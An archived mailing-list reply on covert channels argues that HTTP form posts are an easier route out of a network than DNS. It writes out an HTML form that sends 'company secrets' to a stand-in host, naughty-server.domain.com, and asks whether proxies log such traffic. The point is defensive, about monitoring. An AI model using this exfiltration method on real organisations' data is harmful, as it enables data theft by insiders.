RE: Covert Channels (was dns outbound)

["Mayne, Peter" <Peter.Mayne () compaq com>]

Why bother with low-bandwidth DNS traffic? Write yourself a .htm file
containing the following:

<form action="http://naughty-server.domain.com/accept.cgi"; method="post">
<input type="text" name="i1" value="Here are the company secrets.">
<input type="text" name="i2" value="Widget V2 will be released on
1-Jul-1999."
<input type="submit" name="submit" value="Send Secrets">
</form>

(It's obviously a trivial exercise to write a Perl script that takes a Word
document and MIME encodes it appropriately.)

Load the file into your favourite browser, hit the submit button, and let
accept.cgi write the form data somewhere convenient. How many proxies will
log the contents of the form? Shouldn't this data be logged somewhere?

(Of course, if you don't log the contents of your outgoing mail, why bother
logging this stuff? Not to mention those pocket-sized DATs.)

HTTP has always been a quick and easy way of sending data. It doesn't help
that everyone on the planet (and probably some off it) is using HTTP as a
transport for whatever they happen to be interested in (RealPlayer,
Microsoft's DCOM, SETI@Home 8-).

Stopping covert channels on a system is frightfully difficult. How do you
stop someone from doing Morse code using CPU usage, for instance. (Three
short do-nothing loops, three long do-nothing loops, three short do-nothing
loops.)

PJDM
----
Peter Mayne, Compaq Computer Australia, Canberra, ACT
These are my opinions, and have nothing to do with Compaq.
"The wise man knows that he knows nothing." - Bill. "That's us, dude!" -
Ted.